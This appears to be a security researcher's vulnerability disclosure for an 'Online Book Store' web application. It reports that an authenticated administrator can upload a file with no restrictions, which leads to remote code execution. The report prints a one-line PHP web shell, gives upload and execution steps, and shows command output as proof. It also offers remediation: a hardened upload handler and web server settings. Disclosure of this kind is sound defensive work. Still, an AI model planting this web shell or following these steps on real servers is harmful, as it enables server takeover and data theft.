June 10, 2026
Critical — Authenticated Remote Code Execution (RCE) via Unrestricted File Upload
Hemant Raj Bhati
Executive Summary
A critical vulnerability was identified in the Book Management module of the Online Book Store application. The application allows authenticated administrators to upload arbitrary files without sufficient validation of file type, extension, or executable content.
By uploading a malicious PHP web shell, an attacker can execute operating system commands on the underlying server, resulting in Remote Code Execution (RCE). Successful exploitation allows complete compromise of the web application and may lead to full server takeover depending on the hosting environment and system privileges.
Vulnerability Details
Vulnerability Type: Unrestricted File Upload
Impact: Remote Code Execution (RCE)
Severity: Critical
CWE: CWE-434
Authentication Required: Yes (Administrator)
CVSS v3.1: 9.1 (Critical)
Affected Functionality
Book Management Module
Endpoint:
/admin/index.php?page=books
Uploaded files are stored in:
/admin/assets/uploads/
Description
The application fails to properly validate uploaded files before storing them in a web-accessible directory.
An authenticated administrator can upload a PHP file containing arbitrary server-side code. Since uploaded files are placed inside an executable directory and are accessible through the browser, the uploaded PHP file is interpreted by the server and executed.
This behavior allows attackers to run arbitrary operating system commands with the privileges of the web server process.
Steps to Reproduce
Step 1 — Authenticate
Log in to the administrative dashboard using valid administrator credentials.
Step 2 — Prepare Malicious File
Create the following PHP web shell:
<?php
system($_GET['cmd']);
?>
Filename: shell3.php
Step 3 — Upload File
Navigate to:
Master List → Books → New
Upload the malicious PHP file using the image upload functionality.
Step 4 — Save Record
Save the book entry.
The application stores the uploaded file inside:
/admin/assets/uploads/
Step 5 — Access Uploaded File
Open the uploaded file directly through the browser.
Example:
http://localhost/book_store/admin/assets/uploads/1781034960_shell3.php
Step 6 — Execute Commands
Execute operating system commands using the cmd parameter.
Example:
http://localhost/book_store/admin/assets/uploads/1781034960_shell3.php?cmd=whoami
Response:
www-data
Proof of Exploitation
Command 1
Request:
?cmd=whoami
Response:
www-data
Command 2
Request:
?cmd=id
Response:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Command 3
Request:
?cmd=pwd
Response:
/var/www/html/book_store/admin/assets/uploads
The responses confirm successful execution of arbitrary operating system commands on the server.
Security Impact
An attacker with administrative access can:
• Execute arbitrary system commands
• Read sensitive application files
• Access database credentials
• Extract customer information
• Modify application source code
• Install backdoors
• Establish persistence
• Pivot to internal infrastructure
• Achieve complete application compromise
Depending on server configuration, this may result in full operating system compromise.
Root Cause
The vulnerability exists because:
- File extensions are not adequately restricted.
- Uploaded content is not validated.
- Executable files can be stored inside a web-accessible directory.
- PHP execution is permitted within the uploads directory.
- No server-side filtering is implemented to prevent dangerous file types.
Remediation
Immediate Fixes
- Restrict uploads to approved image formats only. Allowed:
  - .jpg
  - .jpeg
  - .png
  - .gif
  - .webp
- Validate MIME type server-side.
- Validate file signatures (magic bytes).
- Rename uploaded files using random identifiers.
- Store uploads outside the web root.
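The immediate fixes above as one hardened upload handler. This is an added example, not the Online Book Store's own code; UPLOAD_DIR, the form field name img and PHP 8+ are assumptions.

```php
<?php
// Added example, not the Online Book Store's own code: a hardened image
// upload handler implementing the immediate fixes above (PHP 8+ assumed).
// UPLOAD_DIR and the usage call at the bottom are assumptions for illustration.

const UPLOAD_DIR = '/var/www/book_store_private/uploads'; // outside the web root
const MAX_BYTES  = 2 * 1024 * 1024;

// Allow-list: extension => MIME type the file content must actually have.
const ALLOWED = [
    'jpg'  => 'image/jpeg', 'jpeg' => 'image/jpeg',
    'png'  => 'image/png',  'gif'  => 'image/gif',
    'webp' => 'image/webp',
];

// Magic-byte check, independent of finfo (defence in depth).
function hasImageSignature(string $path, string $mime): bool {
    $head = file_get_contents($path, false, null, 0, 12);
    if ($head === false || strlen($head) < 12) return false;
    return match ($mime) {
        'image/jpeg' => str_starts_with($head, "\xFF\xD8\xFF"),
        'image/png'  => str_starts_with($head, "\x89PNG\r\n\x1A\n"),
        'image/gif'  => str_starts_with($head, 'GIF87a') || str_starts_with($head, 'GIF89a'),
        'image/webp' => substr($head, 0, 4) === 'RIFF' && substr($head, 8, 4) === 'WEBP',
        default      => false,
    };
}

// Validates one entry of $_FILES; returns the stored name or null when rejected.
function storeBookImage(array $file): ?string {
    if ($file['error'] !== UPLOAD_ERR_OK || $file['size'] > MAX_BYTES) return null;
    if (!is_uploaded_file($file['tmp_name'])) return null;
    // 1. Extension allow-list; the original name is never reused for storage.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) return null;
    // 2. MIME type detected server-side from content, never from $_FILES['type'].
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) return null;
    // 3. Magic bytes must agree with the detected type.
    if (!hasImageSignature($file['tmp_name'], $mime)) return null;
    // 4. Random identifier as filename; 5. stored outside the web root.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    return move_uploaded_file($file['tmp_name'], UPLOAD_DIR . '/' . $name) ? $name : null;
}

// Usage from the book form (field name 'img' is an assumption):
$stored = isset($_FILES['img']) ? storeBookImage($_FILES['img']) : null;
if ($stored === null) { http_response_code(400); exit('Upload rejected'); }
```

Content checks alone do not make a web-accessible uploads directory safe, so the random rename, the out-of-web-root storage and the web server hardening in the next section still apply even with these checks in place.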
Web Server Hardening
Disable PHP execution within the uploads directory.
Apache Example (path taken from the pwd output above; php_admin_flag applies only when PHP runs as mod_php, so with PHP-FPM exclude this directory from the handler that proxies .php requests instead):
<Directory "/var/www/html/book_store/admin/assets/uploads">
    php_admin_flag engine off
</Directory>
Nginx Example (the dot in the regex must be escaped, otherwise the pattern also matches names ending in any character followed by php):
location /book_store/admin/assets/uploads/ {
    location ~ \.php$ {
        deny all;
    }
}
Additional Controls
- Implement allow-list validation.
- Block dangerous extensions.
- Perform content inspection.
- Apply least-privilege permissions.
- Log and monitor upload activity.
Risk Rating
Severity: Critical
Likelihood: High
Impact: Complete Server Compromise
Overall Risk: Critical
References
CWE-434 — Unrestricted Upload of File with Dangerous Type
OWASP File Upload Security Cheat Sheet
OWASP Top 10 — Security Misconfiguration
Author
Security Researcher: Hemant Raj Bhati
Category: Web Application Security
Affected Application: Online Book Store System